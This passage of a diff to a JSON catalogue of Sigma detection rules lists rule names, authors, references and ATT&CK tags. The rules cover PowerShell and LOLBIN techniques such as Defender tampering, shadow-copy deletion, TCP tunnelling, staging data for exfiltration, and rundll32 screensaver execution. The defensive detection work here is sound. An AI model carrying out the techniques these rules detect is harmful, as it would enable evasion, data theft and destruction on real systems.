"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006" - ] - }, - "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", - "value": "Suspicious Hyper-V Cmdlets" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule)", - "creation_date": "2017/03/12", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "filename": "posh_ps_susp_invocation_generic.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ed965133-513f-41d9-a441-e38076a0798f", - "value": "Suspicious PowerShell Invocations - Generic" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_invocation_specific.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "value": "Suspicious PowerShell Invocations - Specific" - }, - { - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", - "value": "Change User Agents with WebRequest" - }, - { - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/09", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_iofilestream.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "value": "Suspicious IO.FileStream" - }, - { - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "meta": { - "author": "Florian Roth, Perez Diego (@darkquassar)", - "creation_date": "2019/02/11", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_keywords.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", - "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", - "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "value": "Suspicious PowerShell Keywords" - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_local_group_reco.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", - "value": "Suspicious Get Local Groups Information - PowerShell" - }, - { - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/07/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_mail_acces.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114.001" - ] - }, - "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "value": "Powershell Local Email Collection" - }, - { - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/08", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "filename": "posh_ps_susp_mounted_share_deletion.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ] - }, - "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", - "value": "PowerShell Deleted Mounted Share" - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/01", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_mount_diskimage.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ] - }, - "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", - "value": "Suspicious Mount-DiskImage" - }, - { - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_networkcredential.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.001" - ] - }, - "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "value": "Suspicious Connection to Remote Account" - }, - { - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_new_psdrive.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", - "value": "Suspicious New-PSDrive to Admin Share" - }, - { - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/08", + "creation_date": "2022/06/09", "falsepositive": [ - "Unknown" + "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" ], - "filename": "posh_ps_susp_proxy_scripts.yml", + "filename": "proc_creation_win_lolbin_squirrel.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.execution" ] }, - "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", - "value": "Suspicious TCP Tunnel Via PowerShell Script" + "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "value": "Use of Squirrel.exe" }, { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "meta": { - "author": "frack113", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_recon_export.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ] - }, - "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "value": "Recon Information for Export with PowerShell" - }, - { - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_remove_adgroupmember.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ] - }, - "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", - "value": "Remove Account From Domain Admin Group" - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/24", + "creation_date": "2022/09/02", "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" + "Unlikely" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "filename": "proc_creation_win_reg_add_safeboot.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "22d80745-6f2c-46da-826b-77adaededd74", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" - }, - { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_smb_share_reco.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "value": "Suspicious Get Information for SMB Share" - }, - { - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_susp_ssl_keyword.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", - "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", - "value": "Suspicious SSL Connection" - }, - { - "description": "Powershell use PassThru option to start in background", - "meta": { - "author": "frack113", - "creation_date": "2022/01/15", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_start_process.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.001" ] }, - "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", - "value": "Suspicious Start-Process PassThru" + "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "value": "Add SafeBoot Keys Via Reg Utility" }, { - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", "meta": { - "author": "frack113", - "creation_date": "2022/02/01", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "creation_date": "2022/04/28", "falsepositive": [ - "Legitimate PowerShell scripts" + "Legitimate installation of a new screensaver" ], - "filename": "posh_ps_susp_unblock_file.yml", + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ] - }, - "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", - "value": "Suspicious Unblock-File" - }, - { - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_wallpaper.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" - ], - "tags": [ - "attack.impact", - "attack.t1491.001" - ] - }, - "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", - "value": "Replace Desktop Wallpaper by Powershell" - }, - { - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", - "meta": { - "author": "frack113", - "creation_date": "2021/08/23", - "falsepositive": [ - "Admin script" - ], - "filename": "posh_ps_susp_win32_pnpentity.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1120" - ] - }, - "uuid": "b26647de-4feb-4283-af6b-6117661283c5", - "value": "Powershell Suspicious Win32_PnPEntity" - }, - { - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_win32_shadowcopy.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" - }, - { - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "meta": { - "author": "frack113", - "creation_date": "2021/10/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_windowstyle.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ] - }, - "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "value": "Suspicious PowerShell WindowStyle Option" - }, - { - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/16", - "falsepositive": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" - ], - "filename": "posh_ps_susp_write_eventlog.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" ], "tags": [ + "attack.t1218.011", "attack.defense_evasion" ] }, - "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "value": "PowerShell Write-EventLog Usage" + "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "value": "Rundll32 InstallScreenSaver Execution" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "meta": { "author": "frack113", - "creation_date": "2021/07/20", + "creation_date": "2021/07/13", "falsepositive": [ "Unknown" ], - "filename": "posh_ps_susp_zip_compress.yml", + "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ] - }, - "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", - "creation_date": "2020/10/05", - "falsepositive": [ - "App-V clients" - ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" + "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" }, { - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "meta": { - "author": "frack113, elhoim", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_tamper_defender.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "value": "Tamper Windows Defender - ScriptBlockLogging" - }, - { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", - "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" - }, - { - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_test_netconnection.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", - "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ] - }, - "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "value": "Testing Usage of Uncommonly Used Port" - }, - { - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/08/03", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "posh_ps_timestomp.yml", - "level": "medium", - 